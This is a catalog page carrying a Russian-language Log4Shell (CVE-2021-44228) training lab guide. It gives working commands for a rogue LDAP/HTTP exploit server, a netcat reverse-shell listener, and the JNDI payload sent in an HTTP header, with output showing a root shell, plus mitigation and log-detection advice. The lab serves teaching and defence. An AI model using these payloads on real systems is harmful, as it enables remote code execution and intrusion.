Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Log4Shell-CVE-2021-44228 — 使用 Docker、Kali Linux、Burp Suite 和 log4j-shell-poc 利用和理解 Log4Shell (CVE-2021-44228) 的实践实验室。仅用于受控实验室环境中的教学和防御性培训。 | Kitploit
Инструменты/GitHubGitHub/drhaitham/log4shell-cve-2021-44228
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияОбратная инженерияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеОбучение и ОбразованиеRed Teaming
Лаборатории и Практика
GitHubdrhaitham/log4shell-cve-2021-44228

Log4Shell-CVE-2021-44228

使用 Docker、Kali Linux、Burp Suite 和 log4j-shell-poc 利用和理解 Log4Shell (CVE-2021-44228) 的实践实验室。仅用于受控实验室环境中的教学和防御性培训。

Репозиторий
19 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплуатация Log4Shell (CVE-2021-44228): Полная современная демонстрационная лаборатория

Log4Shell (CVE-2021-44228) — одна из самых значительных уязвимостей удалённого выполнения кода из когда-либо раскрытых. Она затрагивает Apache Log4j 2, широко используемый фреймворк для логирования на Java, и позволяет злоумышленникам выполнять произвольный код, злоупотребляя JNDI-запросами в сообщениях логов.

Это руководство предоставляет полную воспроизводимую демонстрационную лабораторию с использованием:

  • Kali Linux (атакующий)
  • Докеризированное уязвимое приложение Log4j2
  • Публичный PoC log4j-shell-poc
  • curl, Burp Suite и Netcat

Оно предназначено только для обучения, исследований, тренировок и повышения осведомлённости в области защиты в контролируемых средах. Структура и стиль следуют тому же духу, что и README сопутствующей лаборатории «Shellshock».


📌 Содержание

  1. Правовое и этическое уведомление
  2. Общий обзор
  3. Цели обучения
  4. Архитектура лаборатории
  5. Предварительные требования
  6. Установка JDK 1.8.0_202 на Kali
  7. Развёртывание уязвимого приложения Log4j (Docker)
  • Подготовка PoC эксплойта
  • Настройка poc.py для использования JDK 1.8.0_202
  • Запуск служб эксплойта (LDAP + HTTP + генератор нагрузки)
  • Запуск слушателя обратной оболочки
  • Эксплуатация Log4Shell через curl
  • Эксплуатация Log4Shell через Burp Suite
  • Схема цепочки атаки
  • Контрмеры и защита
  • Шпаргалка (все команды)
  • Галерея скриншотов (опционально)
  • Ссылки
  • Благодарности

  • 0. Правовое и этическое уведомление

    Эта лаборатория должна выполняться только в контролируемой среде, где у вас есть явное разрешение (ваша собственная лаборатория, виртуальные машины в классе и т.д.).

    • Не атакуйте производственные системы.
    • Не запускайте это против хостов, которыми вы не владеете или не управляете.
    • Используйте этот материал исключительно для образования, исследований и защиты.

    1. Общий обзор

    Log4Shell (CVE-2021-44228) — это критическая уязвимость удалённого выполнения кода в Apache Log4j 2.

    Проблема возникает, потому что уязвимые версии Log4j2 интерпретируют управляемые атакующим строки, такие как:

    root@kitploit:~
    ${jndi:ldap://ATTACKER_IP:1389/a}
    

    Когда эта строка логируется, Log4j:

    1. Выполняет JNDI-запрос (например, через LDAP) к серверу, контролируемому атакующим.
    2. Получает ссылку на вредоносный Java-класс.
    3. Загружает класс через HTTP и помещает его в JVM.
    4. Выполняет его, что приводит к удалённому выполнению кода.

    В этой лаборатории вы:

    • Запустите уязвимое веб-приложение Log4j2 внутри Docker-контейнера.
    • Запустите вредоносный LDAP + HTTP сервер на Kali с помощью log4j-shell-poc.
    • Доставите полезную нагрузку Log4Shell через curl и через Burp Suite.
    • Захватите обратную оболочку из уязвимого контейнера.

    2. Цели обучения

    К концу этой лаборатории вы сможете:

    1. Объяснить на высоком уровне, как работает Log4Shell и почему JNDI опасен при неправильном использовании.
    2. Развернуть уязвимое приложение Log4j2 с помощью Docker.
    3. Установить и настроить JDK 1.8.0_202, необходимый для PoC.
    4. Запустить вредоносный LDAP-сервер и HTTP-сервер через скрипт PoC.
    5. Запустить уязвимость и получить обратную оболочку.
    6. Использовать Burp Suite для внедрения эксплойта в HTTP-заголовок.
    7. Обсудить реалистичные меры смягчения и стратегии обнаружения.

    3. Архитектура лаборатории

    Все компоненты работают поверх вашей существующей виртуальной лаборатории. В данной статье мы предполагаем:

    • Виртуальная машина Kali Linux является атакующим.
    • Kali также запускает Docker-контейнер с уязвимым приложением.
    КомпонентРоль / ОписаниеИнструменты / СлужбыПример адресации
    Виртуальная машина Kali Linux (атакующий + хост)Запускает PoC эксплойта, LDAP-сервер, HTTP-сервер, слушатель Netcat, Burp SuitePython 3, JDK 1.8.0_202, Netcat, Burp Suite, Docker, curl, Git192.168.1.4 (пример IP Kali)
    Уязвимое веб-приложение Log4j2Цель; веб-приложение Spring Boot, уязвимое к Log4ShellDocker-образ: ghcr.io/christophetd/log4shell-vulnerable-appДоступно по адресу http://127.0.0.1:8080

    Ключевая идея

    Атакующий внедряет:

    root@kitploit:~
    ${jndi:ldap://192.168.1.4:1389/a}
    

    в HTTP-заголовок. Уязвимое приложение логирует его с помощью Log4j2 → выполняет JNDI LDAP-запрос к 192.168.1.4:1389 → загружает вредоносный класс с http://192.168.1.4:8000 → выполняет класс, который открывает обратную оболочку обратно на 192.168.1.4:9001.


    4. Предварительные требования

    На Kali вам нужно:

    • Docker (установлен и работает).
    • Python 3 (по умолчанию в Kali).
    • Netcat (nc).
    • Burp Suite (подойдёт Community Edition).
    • Доступ в Интернет для первоначальных загрузок.
    • Базовое знакомство с Linux и HTTP.

    В этом руководстве мы предполагаем, что IP Kali:

    root@kitploit:~
    192.168.1.4
    

    Если ваш IP отличается, скорректируйте все команды соответственно.


    5. Установка JDK 1.8.0_202 на Kali (обязательно)

    PoC полагается на Java SE 8 Update 202 (JDK 1.8.0_202), поскольку более поздние версии Java ограничивают поведение удалённой загрузки классов, используемое этим эксплойтом.

    Даже если в Kali уже установлен OpenJDK 21 (или аналогичный), вам всё равно нужно установить 8u202 отдельно.

    5.1 Создание рабочей директории

    root@kitploit:~
    mkdir -p ~/Log4Shell
    cd ~/Log4Shell
    

    5.2 Загрузка JDK 8u202 из зеркала HuaweiCloud

    Корень зеркала:

    root@kitploit:~
    https://mirrors.huaweicloud.com/java/jdk/8u202-b08/
    

    Загрузите tarball для Linux x64 (≈185 МБ):

    root@kitploit:~
    wget https://mirrors.huaweicloud.com/java/jdk/8u202-b08/jdk-8u202-linux-x64.tar.gz
    ls -lh jdk-8u202-linux-x64.tar.gz   # должно быть ~185M
    

    5.3 Распаковка в /usr/bin/jdk1.8.0_202

    root@kitploit:~
    sudo mkdir -p /usr/bin/jdk1.8.0_202
    sudo tar -xvf jdk-8u202-linux-x64.tar.gz \
      -C /usr/bin/jdk1.8.0_202 --strip-components=1
    

    Опция --strip-components=1 удаляет корневой каталог из архива, так что файлы попадают непосредственно в /usr/bin/jdk1.8.0_202.

    5.4 Проверка установки

    root@kitploit:~
    /usr/bin/jdk1.8.0_202/bin/java -version
    

    Ожидаемый результат:

    root@kitploit:~
    java version "1.8.0_202"
    Java(TM) SE Runtime Environment (build 1.8.0_202-b08)
    Java HotSpot(TM) 64-Bit Server VM (build 25.202-b08, mixed mode)
    

    Если вы видите это, JDK 1.8.0_202 установлен правильно.


    6. Развёртывание уязвимого приложения Log4j (Docker на Kali)

    В новом терминале на Kali (вы можете оставаться в ~/Log4Shell):

    root@kitploit:~
    docker run --name vulnerable-app --rm -p 8080:8080 \
      ghcr.io/christophetd/log4shell-vulnerable-app@sha256:6f88430688108e512f7405ac3c73d47f5c370780b94182854ea2cddc6bd59929
    

    Вы должны увидеть логи, похожие на:

    root@kitploit:~
    :: Spring Boot ::  (v2.6.1)
    Tomcat initialized with port(s): 8080 (http)
    Tomcat started on port(s): 8080 (http) with context path ''
    Started VulnerableAppApplication ...
    
    • Приложение теперь доступно по адресу http://127.0.0.1:8080/ из Kali.
    • Оставьте этот терминал работающим. Это ваша цель.

    Быстрая проверка:

    root@kitploit:~
    curl http://127.0.0.1:8080/
    

    Вы можете увидеть Whitelabel Error Page (HTTP 400). Это нормально – всё, что нам нужно, это работающее приложение, которое логирует запросы.


    7. Подготовка PoC эксплойта на Kali

    7.1 Клонирование log4j-shell-poc

    В новом терминале:

    root@kitploit:~
    cd ~/Log4Shell
    git clone https://github.com/kozmer/log4j-shell-poc.git
    cd log4j-shell-poc
    

    Проверьте файлы:

    root@kitploit:~
    ls
    # poc.py, target/, README и т.д. Exploit.java будет сгенерирован позже.
    

    8. Настройка poc.py для использования JDK 1.8.0_202

    По умолчанию poc.py ожидает найти локальный JDK в директории с именем jdk1.8.0_20 внутри репозитория. Вместо этого вы установили JDK 8u202 в /usr/bin/jdk1.8.0_202, поэтому вам нужно обновить скрипт.

    8.1 Откройте poc.py в редакторе

    root@kitploit:~
    nano poc.py
    

    8.2 Найдите оригинальные строки пути к Java

    Найдите jdk1.8.0_20 (в nano: Ctrl+W, введите jdk1.8.0_20, нажмите Enter).

    Вы должны найти три вхождения, такие как:

    root@kitploit:~
    subprocess.run([os.path.join(CUR_FOLDER, "jdk1.8.0_20/bin/javac"), str(p)])
    
    exit_code = subprocess.call([
        os.path.join(CUR_FOLDER, 'jdk1.8.0_20/bin/java'),
        '-version',
    ], stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)
    
    subprocess.run([
        os.path.join(CUR_FOLDER, "jdk1.8.0_20/bin/java"),
        "-cp",
        os.path.join(CUR_FOLDER, "target/marshalsec-0.0.3-SNAPSHOT-all.jar"),
        "marshalsec.jndi.LDAPRefServer",
        url,
    ])
    

    8.3 Замените на абсолютные пути к JDK 8u202

    Замените их на:

    root@kitploit:~
    subprocess.run(["/usr/bin/jdk1.8.0_202/bin/javac", str(p)])
    
    exit_code = subprocess.call([
        "/usr/bin/jdk1.8.0_202/bin/java",
        '-version',
    ], stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)
    
    subprocess.run([
        "/usr/bin/jdk1.8.0_202/bin/java",
        "-cp",
        os.path.join(CUR_FOLDER, "target/marshalsec-0.0.3-SNAPSHOT-all.jar"),
        "marshalsec.jndi.LDAPRefServer",
        url,
    ])
    

    Сохраните и выйдите:

    • Ctrl + O → Enter
    • Ctrl + X

    Теперь PoC использует JDK 1.8.0_202 из /usr/bin.


    9. Запуск служб эксплойта (LDAP + HTTP + генератор нагрузки)

    Из ~/Log4Shell/log4j-shell-poc:

    9.1 Запустите скрипт PoC

    root@kitploit:~
    python3 poc.py --userip 192.168.1.4 --webport 8000 --lport 9001
    

    Параметры:

    • --userip – ваш IP Kali (атакующий): например 192.168.1.4.
    • --webport – порт для встроенного HTTP-сервера: 8000.
    • --lport – порт, к которому подключается полезная нагрузка: 9001.

    Если всё настроено правильно, вы должны увидеть что-то вроде:

    root@kitploit:~
    [!] CVE: CVE-2021-44228
    [!] Github repo: https://github.com/kozmer/log4j-shell-poc
    
    [+] Exploit java class created success
    [+] Setting up LDAP server
    
    [+] Send me: ${jndi:ldap://192.168.1.4:1389/a}
    
    [+] Starting Webserver on port 8000 http://0.0.0.0:8000
    Listening on 0.0.0.0:1389
    

    Важно:

    • LDAP-сервер прослушивает порт 1389.

    • HTTP-сервер прослушивает порт 8000.

    • Напечатана точная полезная нагрузка для внедрения:

      root@kitploit:~
      ${jndi:ldap://192.168.1.4:1389/a}
      

    Оставьте этот терминал работающим.


    10. Запуск слушателя обратной оболочки (Netcat)

    Откройте ещё один новый терминал на Kali:

    root@kitploit:~
    nc -nvlp 9001
    

    Вы должны увидеть:

    root@kitploit:~
    listening on [any] 9001 ...
    

    Этот слушатель будет принимать обратную оболочку от уязвимого приложения.

    На данный момент у вас должно быть:

    1. Docker-контейнер с работающим уязвимым приложением (порт 8080).
    2. poc.py, запущенный с LDAP (1389) и HTTP (8000).
    3. Netcat, прослушивающий порт 9001.

    11. Эксплуатация Log4Shell через curl

    Сначала докажите, что эксплойт работает, используя прямой HTTP-запрос.

    В новом терминале (или используйте один из доступных):

    root@kitploit:~
    curl http://127.0.0.1:8080 \
      -H 'X-Api-Version: ${jndi:ldap://192.168.1.4:1389/a}'
    

    Что происходит:

    1. Уязвимое приложение получает запрос и логирует заголовок X-Api-Version.
    2. Log4j2 видит ${jndi:ldap://192.168.1.4:1389/a} и выполняет JNDI LDAP-запрос.
    3. Ваш LDAP-сервер (внутри poc.py) отвечает ссылкой на вредоносный Java-класс, размещённый на вашем HTTP-сервере.
    4. Приложение загружает и выполняет класс.
    5. Класс подключается обратно к 192.168.1.4:9001 и запускает оболочку.

    В случае успеха ваш терминал Netcat покажет:

    root@kitploit:~
    connect to [192.168.1.4] from (UNKNOWN) [172.17.0.2] 48xxx
    id
    uid=0(root) gid=0(root) groups=0(root), ...
    

    Теперь у вас есть root-оболочка внутри Docker-контейнера.

    Попробуйте:

    root@kitploit:~
    id
    hostname
    ls /
    

    Выйдите с помощью:

    root@kitploit:~
    exit
    

    Netcat вернётся в режим прослушивания.


    12. Эксплуатация Log4Shell через Burp Suite (стиль браузера)

    Теперь продемонстрируйте тот же путь эксплуатации с помощью браузера, опосредованного Burp Suite.

    12.1 Настройка Firefox на использование Burp в качестве прокси

    1. Запустите Burp Suite на Kali.

    2. В Burp убедитесь, что слушатель прокси работает на 127.0.0.1:8080.

    3. В Firefox:

      • Настройки → Сетевые настройки → Ручная настройка прокси.
      • HTTP прокси: 127.0.0.1, Порт: 8080.
      • Отметьте «Использовать этот прокси также для HTTPS».
      • Убедитесь, что нет исключений для 127.0.0.1.

    12.2 Захват первоначального запроса

    1. В Burp → Proxy → Intercept, убедитесь, что Intercept включён.

    2. В Firefox перейдите по адресу:

      root@kitploit:~
      http://127.0.0.1:8080/
      
    3. Burp покажет перехваченный запрос, например:

      root@kitploit:~
      GET / HTTP/1.1
      Host: 127.0.0.1:8080
      User-Agent: Mozilla/5.0 ...
      ...
      

    12.3 Отправка запроса в Repeater

    1. На вкладке Proxy → Intercept щёлкните правой кнопкой мыши по запросу.
    2. Выберите Send to Repeater.
    3. Переключитесь на вкладку Repeater.

    12.4 Внедрение полезной нагрузки Log4Shell в HTTP-заголовок

    В Repeater измените запрос, чтобы включить заголовок X-Api-Version:

    root@kitploit:~
    GET / HTTP/1.1
    Host: 127.0.0.1:8080
    X-Api-Version: ${jndi:ldap://192.168.1.4:1389/a}
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Upgrade-Insecure-Requests: 1
    

    Примечания:

    • Замените 192.168.1.4 на ваш фактический IP Kali, если он отличается.
    • Не кодируйте в URL символы ${} – они должны выглядеть точно так, как показано.
    • Connection: close упрощает задачу (необязательно).

    12.5 Отправка вредоносного запроса

    1. Подтвердите, что poc.py и слушатель Netcat всё ещё работают.
    2. Нажмите Send в Burp Repeater.

    Вы снова можете увидеть страницу ошибки 400 Whitelabel – это нормально.

    Проверьте ваш терминал Netcat:

    root@kitploit:~
    listening on [any] 9001 ...
    connect to [192.168.1.4] from (UNKNOWN) [172.17.0.2] 37244
    id
    uid=0(root) gid=0(root) groups=0(root), ...
    

    Вы снова получили root-оболочку на контейнере, на этот раз с помощью HTTP-запроса, изменённого через Burp, что отражает реалистичный рабочий процесс веб-эксплуатации.


    13. Как работает цепочка эксплойта (техническое резюме)

    1. Атакующий формирует полезную нагрузку JNDI:

      root@kitploit:~
      ${jndi:ldap://192.168.1.4:1389/a}
      
    2. Уязвимое приложение логирует эту строку с помощью Log4j2.

    3. Log4j2 интерпретирует ${jndi:...} и выполняет JNDI-запрос.

    4. Запрос использует LDAP для связи с LDAP-сервером атакующего на 192.168.1.4:1389.

    5. LDAP-сервер (marshalsec) отвечает javaNamingReference, указывающим на контролируемый атакующим класс, размещённый через HTTP, например:

      root@kitploit:~
      http://192.168.1.4:8000/Exploit.class
      
    6. JVM жертвы загружает и загружает этот класс.

    7. Конструктор класса открывает сокет обратно на 192.168.1.4:9001 и привязывает к нему /bin/sh.

    8. Слушатель Netcat атакующего принимает входящее соединение и получает удалённую root-оболочку внутри контейнера.


    14. Смягчение и защита

    В реальных средах следует применять несколько уровней защиты.

    14.1 Обновление Log4j2

    • Обновитесь до 2.17.1 или новее (или рекомендованной вендором безопасной версии).
    • Эти версии отключают или сильно ограничивают JNDI-запросы по умолчанию.

    14.2 Отключение JNDI / поиск сообщений

    Для всё ещё уязвимых развёртываний добавьте:

    root@kitploit:~
    -Dlog4j2.formatMsgNoLookups=true
    

    (Где применимо – обратите внимание, что не все уязвимые конфигурации исправляются этим флагом в одиночку.)

    14.3 Удаление JndiLookup из JAR-файлов log4j-core

    В качестве меры защиты в глубину:

    root@kitploit:~
    zip -q -d log4j-core-*.jar \
      org/apache/logging/log4j/core/lookup/JndiLookup.class
    

    14.4 Укрепление исходящего сетевого доступа

    • Ограничьте исходящие LDAP, RMI и произвольный HTTP с серверов приложений.
    • Фильтрация исходящего трафика и строгие политики брандмауэра могут помешать серверам связываться с инфраструктурой, контролируемой атакующим.

    14.5 Обнаружение и мониторинг

    • Ищите в логах подозрительные шаблоны, такие как ${jndi: или ${${lower:j}${upper:ndi}:.
    • Отслеживайте необычные исходящие LDAP/RMI-соединения с серверов.
    • Разверните правила IDS/IPS/SIEM для индикаторов Log4Shell и трафика PoC.

    15. Шпаргалка (все команды)

    Краткий обзор команд, использованных в этой лаборатории.

    15.1 Рабочая директория

    root@kitploit:~
    mkdir -p ~/Log4Shell
    cd ~/Log4Shell
    

    15.2 Загрузка JDK 8u202 (≈185 МБ)

    root@kitploit:~
    wget https://mirrors.huaweicloud.com/java/jdk/8u202-b08/jdk-8u202-linux-x64.tar.gz
    ls -lh jdk-8u202-linux-x64.tar.gz
    

    15.3 Установка JDK 1.8.0_202

    root@kitploit:~
    sudo mkdir -p /usr/bin/jdk1.8.0_202
    sudo tar -xvf jdk-8u202-linux-x64.tar.gz \
      -C /usr/bin/jdk1.8.0_202 --strip-components=1
    
    /usr/bin/jdk1.8.0_202/bin/java -version
    

    15.4 Запуск уязвимого Docker-приложения

    root@kitploit:~
    docker run --name vulnerable-app --rm -p 8080:8080 \
      ghcr.io/christophetd/log4shell-vulnerable-app@sha256:6f88430688108e512f7405ac3c73d47f5c370780b94182854ea2cddc6bd59929
    

    15.5 Клонирование репозитория PoC

    root@kitploit:~
    cd ~/Log4Shell
    git clone https://github.com/kozmer/log4j-shell-poc.git
    cd log4j-shell-poc
    

    15.6 Обновление путей к Java в poc.py (сводка)

    Замените:

    root@kitploit:~
    os.path.join(CUR_FOLDER, "jdk1.8.0_20/bin/javac")
    os.path.join(CUR_FOLDER, "jdk1.8.0_20/bin/java")  # два использования
    

    На:

    root@kitploit:~
    "/usr/bin/jdk1.8.0_202/bin/javac"
    "/usr/bin/jdk1.8.0_202/bin/java"
    

    15.7 Запуск PoC (LDAP + HTTP + полезная нагрузка)

    root@kitploit:~
    python3 poc.py --userip 192.168.1.4 --webport 8000 --lport 9001
    

    15.8 Слушатель обратной оболочки Netcat

    root@kitploit:~
    nc -nvlp 9001
    

    15.9 Эксплуатация через curl

    root@kitploit:~
    curl http://127.0.0.1:8080 \
      -H 'X-Api-Version: ${jndi:ldap://192.168.1.4:1389/a}'
    

    15.10 Строка полезной нагрузки для заголовков

    root@kitploit:~
    ${jndi:ldap://192.168.1.4:1389/a}
    

    15.11 Заголовок Burp Repeater

    root@kitploit:~
    X-Api-Version: ${jndi:ldap://192.168.1.4:1389/a}
    

    16. Галерея скриншотов

    ОписаниеИзображение
    Установка JDK / настройка среды
    Запущенный скрипт PoC (запуск полезной нагрузки)
    Работающее уязвимое веб-приложение Tomcat
    Обновление скрипта эксплойта PoC

    17. Ссылки

    • Оригинальный PoC: kozmer/log4j-shell-poc
    • Уязвимое демо-приложение: christophetd/log4shell-vulnerable-app
    • Уязвимости безопасности Apache Log4j: https://logging.apache.org/log4j/2.x/security.html
    • Запись NIST NVD для CVE-2021-44228: https://nvd.nist.gov/vuln/detail/CVE-2021-44228

    18. Благодарности

    Учебная лаборатория Log4Shell (CVE-2021-44228) – создана с заботой для студентов, защитников и этичных хакеров по всему миру.

    Сделано с любовью:
    Хайтам из Омана ❤️🇴🇲

    Скачать инструмент